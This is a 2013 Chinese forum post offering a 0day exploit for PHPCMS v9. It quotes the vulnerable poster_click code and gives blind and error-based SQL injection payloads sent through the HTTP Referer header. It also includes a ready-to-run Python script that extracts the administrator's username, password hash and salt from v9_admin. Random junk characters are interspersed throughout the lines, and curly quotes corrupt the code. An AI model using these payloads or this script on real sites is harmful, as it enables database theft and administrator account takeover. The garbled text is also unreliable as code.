有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
3 j5 y: c: F) @: O" W6 e; a4 ^- N1 m, ]* l! o: m: l: a+ t
问题函数\phpcms\modules\poster\index.php
5 }5 _) k5 h$ R4 w2 u$ Q6 z3 u; i) h/ a/ E# `+ `/ |- k
public function poster_click() {
4 z: l% N' | q+ _$ o6 Q" V$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
- c: D" u8 r8 ~$ R8 S) K$r = $this->db->get_one(array('id'=>$id));5 {' Z/ T9 K/ c/ X+ D
if (!is_array($r) && empty($r)) return false;: z$ r- a" s, O1 B: v
$ip_area = pc_base::load_sys_class('ip_area');
) W: Y3 x- x' n3 J$ip = ip();# g' T. {! F6 T( O0 r- W) ]5 q
$area = $ip_area->get($ip);
7 C7 Z P5 g2 `% H2 K3 N$username = param::get_cookie('username') ? param::get_cookie('username') : '';" z) a4 T: p U |
if($id) {( O& I+ p3 V4 C% r' {
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
7 N9 E3 q+ S$ n1 m1 _$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));6 v8 Z4 H, m9 X4 u
}9 j# B/ E/ `( i* B, h+ c* _. n7 r- |- u
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
4 K' p2 J) l' S% @, x/ e3 ]$setting = string2array($r['setting']);
1 |" e" J; K) x, y& F! I' Pif (count($setting)==1) {1 X, z9 f! I! h. U+ g
$url = $setting['1']['linkurl'];
' H% w! H7 p* e& D} else {9 p/ ^( [: y; i) o$ J, `. B# h8 S
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
+ F7 s9 D) l( G0 T4 X}) L( l3 a: O7 P g2 \+ u5 T( s
header('Location: '.$url);" Y& m2 M7 I' ^7 C& j' k
}
4 a) Z8 u! h# W- \7 m9 u
+ [! B0 @9 X1 J
$ Q8 S4 R9 ]- j. s- W' E" s, {
7 f1 D9 g- }; T0 F: i利用方式:' Y# R }# q" s
1 q% u1 {$ B4 ^( i$ u" |; a1 e$ `1、可以采用盲注入的手法:
- S2 g' d6 [8 N! c1 g) R' j
) d- K, K0 F8 K R) v( {referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#" h8 E5 E& ], T/ F5 ^+ s
6 I8 g- I4 ?- b- v1 ~, N
通过返回页面,正常与否一个个猜解密码字段。3 J1 x0 w j/ D0 b7 d! @+ `
, \9 y( ~, q2 q, x7 J8 D& Y$ w
2、代码是花开写的,随手附上了:
( @' N; e/ m5 u* t. i
- E* K' x1 M9 @; A, l, J% W- Q; O1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
B9 ]( r5 B5 b& Z
6 C$ L: B- f P& ]# K此方法是爆错注入手法,原理自查。; l5 u$ e' K! n+ r
" U8 v! b( a( ?; {/ E8 D$ C# L* R
; r* _& n! |; O3 { ?; q) T. @* \2 B s; j# |% d& \1 C
利用程序:
- A8 J: G& N* V$ h4 R9 S/ N$ w
' [* h$ M9 g& D0 J7 K- g; Y# L#!/usr/bin/env python( X2 Z7 v9 L* p1 U
import httplib,sys,re) K4 I3 @8 b/ U& L- C/ Z
1 I7 K) R" E# b. _
def attack():
0 J# r+ x. ~% h7 M2 Bprint “Code by Pax.Mac Team conqu3r!”( \: I2 `* j2 V
print “Welcome to our zone!!!”& ~! A8 u+ D5 f% a. [+ B
url=sys.argv[1] O9 w8 l |6 H7 l b" v4 [- _' K
paths=sys.argv[2]
2 r1 q7 Y+ c7 a4 aconn = httplib.HTTPConnection(url), ^( N9 x' K) Z- L" B2 I5 [
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
% R1 k7 \% T9 g) ?“Accept”: “text/plain”,
! R9 y" k; A/ [- v! V7 B* ]; o“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}8 [. \; E4 x C4 K' q2 U1 O
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
! v7 |) s" _" T! P6 _3 _: Nr1 = conn.getresponse()' n7 `$ ^! ?! S2 [1 }: _3 g
datas=r1.read()
' ~% D Y! c# Odatas=re.findall(r”Duplicate entry \’\w+’”, datas)2 ^/ Y& {6 T5 }+ c6 U. J
print datas[0]
1 Y. V5 z: e/ |$ y7 ^. g+ lconn.close()+ N7 ]$ ]1 k u: y( a( m, \& d2 d o, b
if __name__==”__main__”:( J) y1 I) x4 d8 h2 S+ p
if len(sys.argv)<3:
! O R! G/ x. B& d! }% Mprint “Code by Pax.Mac Team conqu3r”9 J, Q) J, m3 b, \2 V* J
print “Usgae:”
+ c" X& p( o, g; K$ tprint “ phpcmsattack.py www.paxmac.org /”# E" i5 c+ S' H. b- G* j
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
- [/ V2 m8 r( R( M9 \! d- L) Bsys.exit(1)
& F, D- l8 ~4 A- z# Dattack()
; U+ e! f+ F; Y9 E+ J5 {0 [) Q4 H$ a
|
发表于 2013-1-11 21:01:00
收藏
支持
反对